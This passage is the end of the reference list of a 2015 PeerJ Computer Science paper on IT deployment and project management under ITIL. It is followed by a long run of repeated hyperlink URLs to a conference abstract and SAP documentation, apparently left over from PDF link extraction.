(‘5. Jahrestagung IT Change und Release Management’), a marcus evans event. 26–27.6. 2014, Berlin, Germany. Nageldinger G. 2015. IT’s missing chapter: interrelations and interdependencies between deployment and project management (ITILs fehlendes Kapitel: Die Wechselwirkung zwischen dem Deployment—und Projektmanagement). In: iqnite Europe 2015. 28–30.4.2015, Düsseldorf, Germany; abstract. Available at http://www.iqnite-conferences.com/de/programm/abstracts/ nageldinger ab.pdf (accessed 13 7 2015). PMI (Project Management Institute). 2001. A guide to the project management body of knowledge (PMBOK R⃝ guide). 2000 ed. Project Management Institute, Inc., 44. Proehl T, Erek K, Limbach F, Zarnekow R. 2013. Topics and Applied Theories in IT Service Management. In: System Sciences (HICSS), 2013, 46th Hawaii international conference on, IEEE conference publications. 1367–1375 DOI 10.1109/HICSS.2013.555. Rance S. 2011. ITIL service transition 2011 edition best management practices. The Stationery Office, 148. SAP AG. 2009. Template Management: using templates in global rollout, solution management—application lifecycle management. Available at http://www.sdn.sap.com/irj/scn/ go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index& overridelayout=true&45896020704110 (accessed 16 June 2015). Shahsavarani N, Ji S. 2011. Research in information technology service management (ITSM): theoretical foundation and research topic perspectives. In: CONFIRM 2011 Proceedings, vol. 30. 2011. Shivashankarappa AN, Dharmalingam R, Smalov L, Anbazhagan N. 2012. Implementing it governance using Cobit: a case study focusing on critical success factors’ Internet Security (WorldCIS). In: 2012 World Congress. 144–149 Available at http://ieeexplore.ieee.org/xpl/ articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls% 2Fabs all.jsp%3Farnumber%3D6280217 (accessed 16 June 2015). Tanovic A, Orucevic F. 2011. Integration of PRINCE2 model into ITIL V3 model. In: Telecommunications Forum (TELFOR), 2011, 19th, IEEE conference publications. 102–105 DOI 10.1109/TELFOR.2011.6143503. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 31/31 https://peerj.com/computer-science/ http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://dx.doi.org/10.1109/HICSS.2013.555 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/20c957bc-01bb-2c10-0bb1-ed8c458b5b09?QuickLink=index&overridelayout=true&45896020704110 